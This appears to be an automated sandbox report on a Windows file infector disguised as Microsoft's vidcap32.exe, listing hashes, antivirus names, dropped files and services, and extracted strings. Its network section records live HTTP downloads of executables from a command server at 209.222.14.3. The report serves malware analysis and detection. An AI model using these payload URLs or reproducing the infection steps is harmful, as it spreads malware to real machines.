Analysis Date2015-01-24 21:39:26
MD56b0c1042628787cbd868d9a1995ec826
SHA1e6dfc4ff8e8f39315376c8476590b3e2095f993a

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: c0d928faa1d55c375decda858a4db915 sha1: d1a344dafb3e50a523797d7afc010e147f603cc8 size: 65024
SectionINIT_TEX md5: 5c2ae2c740225cf9d8c2e1b65f049719 sha1: 34e609512c684f432b6517703d7d8d699dbd41ee size: 512
Section.data md5: 74a22cd0e9ac7235b7e0f82e17e01b11 sha1: 574e77195a35a1f212376b6796d8324a46413e6e size: 11776
Section.rsrc md5: 5d78fb20039c1a09d1abb40350c3bb97 sha1: 2ad91221f900fa1bee12c740e4336c6cd1f92551 size: 66053
Section.tcp md5: c20c14c18831a4ca3bdf7273c0bfaa7b sha1: ae6642da16594e03a089a4afaa485986be2945aa size: 26624
Timestamp1999-03-27 17:57:59
VersionLegalCopyright: Copyright (C) Microsoft Corp. 1981-1999
InternalName: vidcap32.exe
FileVersion: 5.00.2008.1
CompanyName: Microsoft Corporation
ProductName: Microsoft(R) Windows (R) 2000 Operating System
ProductVersion: 5.00.2008.1
FileDescription: Microsoft® Video Capture Utility
OriginalFilename: vidcap32.exe
PEhash19371f09c3e650c85b78f3ba00cfc28e8c6141c8
IMPhash4b14e9ebd7fd5133f8c98fd8d1597b7f
AV360 SafeVirus.Win32.Agent.O
AVAd-AwareWin32.Viking.AR
AVAlwil (avast)Crypt-RPT [Trj]
AVArcabit (arcavir)Win32.Viking.AR
AVAuthentiumW32/Patched.E.gen!Eldorado
AVAvira (antivir)W32/Fujacks.DR
AVBullGuardWin32.Viking.AR
AVCA (E-Trust Ino)Win32/Viking.D
AVCAT (quickheal)W32.Agent.DP
AVClamAVWorm.Fujack-55
AVDr. WebWin32.HLLW.Autoruner.8224
AVEmsisoftWin32.Viking.AR
AVEset (nod32)Win32/Agent.DP virus
AVFortinetW32/Fujacks.BF!tr
AVFrisk (f-prot)W32/Patched.E.gen!Eldorado
AVF-SecureWin32.Viking.AR
AVGrisoft (avg)Win32/Funlove.corrupted
AVIkarusTrojan-Downloader.Win32.Jadtre
AVK7Virus ( 00108a531 )
AVKasperskyVirus.Win32.Agent.dp
AVMalwareBytesno_virus
AVMcafeeW32/Fujacks.ay
AVMicrosoft Security EssentialsVirus:Win32/Viking.NK
AVMicroWorld (escan)Win32.Viking.AR
AVRisingWin32.Agent.hn
AVSophosW32/FuzVir-A
AVSymantecW32.Loorp.A!inf
AVTrend MicroPE_JEEFO.D
AVVirusBlokAda (vba32)Virus.Win32.Koklek

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"

Creates FileC:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates FilePIPE\SfcApi
Creates FilePIPE\wkssvc
Creates FileC:\WINDOWS\system32\qmgr.dll
Creates FileC:\WINDOWS\system32\mspmsnsv.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Starts ServiceWmdmPmSN

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 804

Process
↳ Pid 852

Process
↳ C:\WINDOWS\System32\svchost.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝
2
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\UHM3ETW3\desktop.ini
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\AM4HBUNJ\desktop.ini
Creates FileNtHid
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates FileC:\Documents and Settings\NetworkService\Cookies\index.dat
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\OPQRSTUV\desktop.ini
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\TEMP\NtHid.sys
Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\705SOLY5\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\WINDOWS\TEMP\NtHid.sys
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates Mutexc:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!networkservice!cookies!
Creates Mutexc:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates ServiceNtHid - C:\WINDOWS\TEMP\NtHid.sys
Winsock DNS209.222.14.3
Winsock DNSwww.490a-B8B5-9B8C1E870B0C.com
Winsock DNSwww.baidu.com
Winsock DNSpc1.114central.com

Process
↳ Pid 1208

Process
↳ C:\WINDOWS\system32\spoolsv.exe

RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
7
RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
C:\WINDOWS\System32\spool\PRINTERS\\x00
Creates FileWMIDataDevice

Process
↳ Pid 1800

Process
↳ Pid 1104

Network Details:

DNSwww.a.shifen.com
Type: A
180.76.3.151
DNSpc1.114central.com
Type: A
209.222.14.3
DNSwww.baidu.com
Type: A
DNSnbtj.114anhui.com
Type: A
DNSwww.490a-B8B5-9B8C1E870B0C.com
Type: A
HTTP GEThttp://209.222.14.3/ko/01.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://209.222.14.3/ko/02.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://209.222.14.3/ko/03.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1033 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1034 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1035 ➝ 209.222.14.3:80

Raw Pcap
0x00000000 (00000)   47455420 2f6b6f2f 30312e65 78652048   GET /ko/01.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323039 2e323232 2e31342e   ost: 209.222.14.
0x00000090 (00144)   330d0a43 6f6e6e65 6374696f 6e3a204b   3..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....

0x00000000 (00000)   47455420 2f6b6f2f 30322e65 78652048   GET /ko/02.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323039 2e323232 2e31342e   ost: 209.222.14.
0x00000090 (00144)   330d0a43 6f6e6e65 6374696f 6e3a204b   3..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....

0x00000000 (00000)   47455420 2f6b6f2f 30332e65 78652048   GET /ko/03.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323039 2e323232 2e31342e   ost: 209.222.14.
0x00000090 (00144)   330d0a43 6f6e6e65 6374696f 6e3a204b   3..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....


Strings
     
040904B0
0 Frames
0=rtl
0Set capture file, save files or exit application/Select or create a file to capture the video to$Save captured video under a new name=Adjust the amount of disk space allocated to the capture file
&11 kHz
1&6 bit
&22 kHz
&2x Spatial
32,000   (&15 minutes @ 30fps)
324,000 (&3 hours @ 30fps)
32-bit Video Capture Tool
&44 kHz
5.00.2008.1
&8 bit
&About...
About VidCap
&Allocate File Space...
aside for the capture file.  Existing video
&Audio...
&Audio Format...
Audio Format
Background color
&Black
Cancel
&Cancel
&Capture
Capture a palette
Capture a single frame
&Capture audio
Capture a video sequence
Capture file size:
Capture Frames
)Capture frames, palette or video sequence
Capture method
Capture Palette
Capture selected frames
Capture start:
Capture stop:
Capture &to memory
Capture Video Sequence
&Center image in window
Change the window size
Channels
Checklist:
&Close	%d frames
C&lose#Error: Unable to access MCI device.
Co&lors:
comarrow
CompanyName
Com&press...
&Compression...
&Contents	F1
&Continue
&Copy	Ctrl+C
Copyright (C) Microsoft Corp. 1981-1999
(Copyright Microsoft Corporation, 1993-1995)
"Copy to clipboard or paste palette)Copy the displayed frame to the clipboard Paste palette from the clipboard
Could not reconnect to driver3Command line error: usage: vidcap {-d<DeviceIndex>}
Customize the VidCap window
data in the file will be lost.
&Default
&Directly to disk
Display Help Index
Displays program information
Dk &gray
DLGINCLUDE
Do you wish to continue or exit?
&Edit
Edit the captured video file
&Enable capture time limit
Enlarge the window to full size
Enter the amount of disk space to set 
Error accessing sound device
Error registering window class
E&xit
E&xit	Alt+F4
Exit VidCap
&File
FILE
FileDescription
FileVersion
&Frame
&Frame rate:
&Frames...
&Frame(s) Temporal
Free disk space:
Frequency
Get help
         (((((                  H
&Help
If you need to configure a capture driver, choose the "Settings..." button.
If you need to install a capture driver, choose the "Add New Hardware" icon.
Initialization Error
InternalName
Is a driver installed and configured?  Select the "Multimedia" icon from the Control Panel to verify the presence of a capture driver.
Is the capture hardware properly configured?  Check the switch settings and jumpers on the capture device.
LegalCopyright
&Level...
&Load Palette...
Load Palette
&Lt gray
Maximum number of frames
MBytes
MC&I...
&MCI control of source video
MCI device:
MCI Settings
Microsoft
Microsoft Corporation
Microsoft(R) Windows (R) 2000 Operating System
&Mono
+Move, size, or close the application window
Move the window
MS Shell Dlg
No capture device found.)Failed to pre-allocate capture file space!Could not measure free disk space&Could not measure size of capture file
&No master (streams may differ in length)
(null)
&Options
OriginalFilename
&Overlay
&Palette...
Paste &Palette
Pla&y Captured Video...
Play the last capture file
&Play video
Pre&ferences...
&Preview
ProductName
ProductVersion
Quit VidCap2Load a previously saved palette for use in capture
Recording Level
Reduce the window to an icon
Restore window to previous size
Sample size
Save a single frame as a bitmap
Save &Captured Video As...
Save Captured Video As
Save Palette
Save &Palette...
Save Single &Frame...
Save Single Frame(Select Capture to capture an image to %s	%d Frames
Save the current palette
&Seconds:
Select the video source+Select image to display on external monitor
&Set Capture File...
Set Capture File
Set File Size
S&et start
Se&t stop
Set the audio characteristics#Set the image dimensions and format
Set the capture file
Set the volume on your audio source.
!Setup audio and video for capture
&Single Frame
Size &frame to capture window
Source capture style
&Start
&Status bar
Step capture frame averaging
&Step video
&Stereo
&Stop
StringFileInfo
Switch to a new task
Sync &video to audio 
To capture a palette from a continuous stream, click on Start.  To capture from specific frames, click on the Frame button.  Click on Close to end palette capture.
Toggle overlay video
Toggle preview video
&Tool bar
Translation
Unable to play this file
Using Video Capture Window Class
VarFileInfo
VCRLMeter
VidCap
VIDCAP
vidcap32.exe
Vidcap could not initialize the capture device.
VIDCAPICON
VIDCAPMENU	VIDCAPAPP
VidCap Preferences
&Video...
Video and audio synchronization
 Video Capture Utility
Video &Display...
Video &Format...
(video frame rate may change, VFW 1.x default)
Video &Source...
VS_VERSION_INFO
Warning: Using default palette.
Window creation failed!
 0+020e0k0
0,0A0^0s0
%02u:%02u:%02u.%02lu
08101BB
0j/0@0E0R0f0
0T0X0\0`0d0h0l0p0t0x0|
1=>=F=
:1G1P1]1
1K1Z1h1
1#QNAN
1#SNAN
?%?2?]?
2(2B2N2W2c2n
2<2Q{h2p2
2?3H3Q
2D2J2O2U2b1n2t2
>2>E>S>\>s>
2K2f2v2
2T2d2{2
3$30l3Xk
343=3B3j3p3|3
*37}Cg
;3D;H;L
@3T3e3
4&414]4
4%4+4G4
490a-B8B5-9
49-E88E-4c47-98DC
4aaf-A336-C255
4Q5e5x
5!6&6/6
)56Ab5t5
;!;+;5;?;C;J;
:5:F:Y:w:|:
6.6:6C6M6W6\6
6<6]6i6
6!71767D7R7^7i7p7
7.{645FF040
7FC663
7@ip:K
?7N7T7]
8-00AA
@.&'85
>!>*>8>B>H>V>`>
9*:/$:
954E}K
@\96DBA2^
9 9[9`9g9m9s9~9
9&9/9>9Q9e
-9;9A9F9
9ao^@q
9D$*u,9D$.
9.:U:p:}:
A4J4Y4_4
A67-586
abnormal program termination
acmFormatChooseA
acmMetrics
ADVAPI32.dll
AE4C57'
agX \s
a Play
AppendMenuA
appmgmts.dlld
AutoSizeFrame
AVICAP32.dll
AVStreamMaster
BackgroundColor
"bd	WVS
BeginPaint
bgTLOkN
BitBlt
browser
C1E870B0C
CallNextHookEx
CancelConne
 cannot be run i
capCreateCaptureWindowA
capGetDriverDescriptionA
CaptureAudio
CaptureFile
CaptureToDisk
CenterImage
CheckDlgButton
CheckMenuItem
CheckRadioButton
ClientToScreen
CloseHandle
close mciframes
comarrow
comdlg32.dll
CopyRect
Copyro
CP<Z<|<
CreateCompatibleDC
CreateDIBitmap
CreateFileA
CreateFontA
CreatePen
CreateProcessA
CreateSolidBrush
CreateWindowExA
crypt'c
+D$ _^][
D$ _^]
D$0+D$(P
D0H0L0PM
D$8QVRh 
DA-6D69-472e-8981-DBC71
`.data
Ddk h$
default
DefWindowProcA
DeleteDC
DeleteObject
DestroyWindow
(D/fc_oL
DialogBoxParamA
DIALOGS.H
*.dib;*.bmp
DispatchMessageA
DOMAIN error
DOS mode.
D$(PWSUQ
DrawMenuBar
D$TRVP
dU5 B~
&=,=D=v=
E8J8O8[8`8i8o8z8
EnableMenuItem
EnableWindow
EndDialog
EndPaint
ep1'*"/
eParam$
Esht*6
ew=[hw
ExecuUA
exe\vidcap32.dbg
ExitProcess
Expor.exe
ExtTextOutA
F??3@YAXP
f9|$(w
f+D?	D
FillRect
FindResourceA
- floating point not loaded
FlushFileBuffers
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeResource
~Fun Loving Criminal~
GDI32.dll
GetACP
GetActiveWindow
GetCapture
GetClientRect
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentThreadId
GetDiskFreeSpaceA
GetDlgCtrlID
GetDlgItem
GetDlgItemInt
GetDlgItemTextA
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetFocus
GetFullPathNameA
GetKeyState
GetLastActivePopup
GetLastError
GetMenu
GetMessageA
GetMessagePos
GetModuleFileNameA
GetModuleHandleA
GetOEMCP
GetOpenFileNameA
GetParent
GetProcAddress
GetSaveFileNameA
GetScrollPos
GetScrollRange
GetStartupInfoA
GetStdHandle
GetStockObject
GetStringTypeA
GetStringTypeW
GetSubMenu
GetSysColor
GetSystemMetrics
GetTempPathA
GetTextMetricsA
GetVersion
GetWindowLongA
GetWindowPlacement
GetWindowRect
GetWindowTextA
GlobalAlloc
GlobalFree
GlobalHandle
GlobalLock
GlobalReAlloc
GlobalSize
GlobalUnlock
`h````
h1l1.T
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HHt~HH
HHt"Ht
HSUVWh
Ht~HtpH
Hur3'$
iD&YomH
ifyTrLo
igVCRT
IndexSize
InfGma
InflateRect
ingCompatibil
INIT_TEX
IntersectRect
InvalidateRect
InvertRect
IocSymd
IsCharAlphaA
IsCharAlphaNumericA
IsClipboardFormatAvailable
IsDlgButtonChecked
?IsProcessorFeaturePresent
IsWindow
IsWindowEnabled
i|tlh`
ItrIItnIt
IXR-!m
_;i;z;
j2VVVVVVVh
 -k 4/
kca:\lsa
KERNEL32
KERNEL32.dll
KERNEL32.DLL
KEveny
KillTimer
KK<5|1;
K:\Q.pdb`q
L5PFHP7b
LCMapStringA
LCMapStringW
%ld.000
LimitEnabled
LineTo
LiveWindow
LoadAcceleratorsA
LoadCursorA
LoadIconA
LoadLibraryA
LoadResource
LoadStringA
LocalAlloc
LocalFree
LockResource
lp6a J
L$ PQF
L$ RQP
lstrcatA
lstrcmpA
lstrcpyA
lstrlenA
L$ UQSRP
m1\U\Kcn
MapWindowPoints
MCIControl
MCIDevice
mciSendCommandA
mciSendStringA
MCIStartTime
MCIStopTime
M:d:m:
MessageBeep
MessageBoxA
MicroSecPerFrame
Microsoft AVI
Microsoft Palette
Microsoft Visual C++ Runtime Library
Microsoft Windows DIB
MoveToEx
MoveWindow
MSACM32.dll
MSN Gam
MSVCRT.dll
MulDiv
MultiByteToWideChar
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
 NT\Curr
NTDLL.DLL
NtQu9y
(null)
Nv`mG}
OffsetRect
oft\Wud
o@P3e4
Op-;4$
~OPEN=-
OpenFile
open %s shareable wait alias mciframes
+OpsSCM
|otB.8
,ov\A}
OverlayWindow
PatBlt
PathFileExistsA
PeekMessageA
Polygon
PostMessageA
PostQuitMessage
ppppppppppz
pppppw
pppwpwwx
pppwwp
pppwwwp
pppwwwpp
pppwwwppwpz
ppwwpw
ppwwww
ppxxxx
Program: 
<program name unknown>
PtInRect
- pure virtual function call
pVKwOf
pwwwwwww
pwwwwwwwpx
pwwwwwwwwpz
pwwwwz
P;Z;d;n;x;
q$A3<.
qidu.com
QQQQQQQ
\Ra7207
 `.rdat[
ReadFile
RECYCLER
RegCloseKey
RegCreateKeyA
RegisterClassA
RegOpenKeyA
RegQueryValueExA
RegSetValueExA
ReleaseCapture
ReleaseDC
Remote
Rich1D[
_rju@_fd
-<RoA%'_h7
RtlIoU
RtlUnwind
runtime error 
Runtime Error!
S1[1`1m1
{schedsvc
Screen Capture
ScreenToClient
SDPSRV
SelectObject
SendDlgItemMessageA
SendMessageA
SetBkColor
SetBkMode
SetCapture
SetClassLongA
SetCursor
SetDlgItemInt
SetDlgItemTextA
SetEndOfFile
SetFilePointer
SetFocus
SetHandleCount
SetMapMode
set mciframes time format milliseconds
SetRect
SetScrollPos
SetScrollRange
SetStdHandle
SetTextColor
SetTimer
SetViewportExtEx
SetViewportOrgEx
SetWindowExtEx
SetWindowLongA
SetWindowOrgEx
SetWindowPos
SetWindowsHookExA
SetWindowTextA
SHELL32.dll
ShellAboutA
ShellExecuteA
SHLWAPI.dll
ShowWindow
SING error
SOFTWARE\Mi
Software\Microsoft\Multimedia Tools\
Sp`FFF
%s - %s
SSSSSV
StatusBar
StatusClass
status mciframes position wait
StepCapture2x
StepCaptureAverageFrames
StepMCIDevice
s_/UYY
swsocknetman1ssdp
tBHt#95
.tcLCI0
T$DQPR
TerminateProcess
.textVT
_This #g
!This program cannot be run in DOS mode.
t(Hu*h
TimeLimit
TLOSS error
tl`TDi
ToFilnH
ToolBar
ToolBarClass
tqHtHH
TranslateAcceleratorA
TranslateMessage
T$ RSUW
|$(;|$,tRWV
T$(SUVf
tTisrv
t.;t$$t(
/;t$$u
?%_#txg
uaSjdh
>"u:F@
	U;MhOy
uMpr.{
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UnhookWindowsHookEx
UpdateWindow
#upnphostKn&s
URLDown
user32.dll
USER32.dll
V3_3o3x3
V6sion\
v7Os2_qWSArcvF
ValidateRect
VC20XC00U
VCRLMeter
v|htcL
VidCap
VIDCAP
vidcapApp
vidcap.hlp
vidcapIcon
vidcapMenu
Video Capture Tool
VideoDisc
vidframeClass
vieAak:m
VirtualAlloc
VirtualFree
VirtualProtect
VPWSUQ
vThfad
VVVVUPQ
\v:.X$
W0YX0wx
|w9=trW
WaveFormatBinary
waveInOpen
WideCharToMultiByte
WindowHeight
WindowShow
WindowWidth
WindowXPos
WindowYPos
WinHelpA
WINMM.dll
 winsta0
WithTag	
WmdmPmSN'Fa
WO$_9E
wppppw
wppwwp
wppwwwp
wppwwwpp
wppwwwppwwz
wpwpwwpz
wpwpwwwz
wpwwpw
wpwwww
wpwwwwwwz
wpwwwwwx
Writea7
WriteFile
wsprintfA
WVVVVh
wwppwwp
wwpwwp
wwpwwwpp
wwwpppwp
wwwpppwwwx
wwwpwwwp
wwwpwwwppx
wwwpwwww
wwwwpwwwpx
wwwwpwwwwx
wwwwpz
wwwwwpz
wwwwww
wwwwwww
wwwwwwwp
wwwwwwww
wwwwwwwwwwz
wwwwwwwwwx
wwwwwwx
wwwwwwz
wwwwwx
wwwwwz
wwwwxwwwwx
<	=x=}=
/X,.CC
 X -ibcB"
<)<.<X<i<o
xmlpbS
{+xN{?ODBE
XPTPSW
XPVSSG
XRichS
xwuLEwE
XX; tg
xxwxwwx
/;%y;~;
.y!GN&
|/Yr3Y
*y/.uzyzuEFz8GD
y%*+vp*vCpuC%
/YW'RB
@z}]u2o